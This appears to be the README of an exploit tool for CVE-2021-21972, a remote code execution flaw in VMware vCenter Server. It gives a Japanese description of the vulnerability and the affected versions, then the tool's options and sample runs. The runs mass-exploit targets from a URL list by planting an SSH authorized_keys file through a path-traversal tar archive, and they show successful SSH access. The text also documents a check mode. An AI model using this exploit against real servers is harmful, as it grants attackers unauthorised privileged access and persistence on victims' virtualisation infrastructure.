
CVE-2021-21972
vSphere Client(HTML5)には、vCenter Server プラグインにリモートコード実行の脆弱性があります。ポート443へのネットワークアクセスが可能な悪意のある攻撃者は、この問題を悪用して、vCenter Server をホストしている基盤オペレーティングシステム上で無制限の権限でコマンドを実行できます。これは、VMware vCenter Server(7.x で 7.0 U1c 未満、6.7 で 6.7 U3l 未満、6.5 で 6.5 U3n 未満)および VMware Cloud Foundation(4.x で 4.2 未満、3.x で 3.10.1.2 未満)に影響します。
% python3 CVE-2021-21972.py -h
Usage: CVE-2021-21972.py [options]
Options:
-h, --help show this help message and exit
-i FILE file containing list of urls
-u URL, --url=URL https://1.1.1.1
-f FILENAME
-n NOOFTHREADS
-e, --exploit
-c, --check
%
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt -n 8 -e
[*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authorized_keys
[+] https://172.16.164.1 SUCCESS
Login using 'ssh -i id_rsa [email protected]'
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972
% python3 /tmp/CVE_2021_21972.py -u https://172.16.164.1 -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972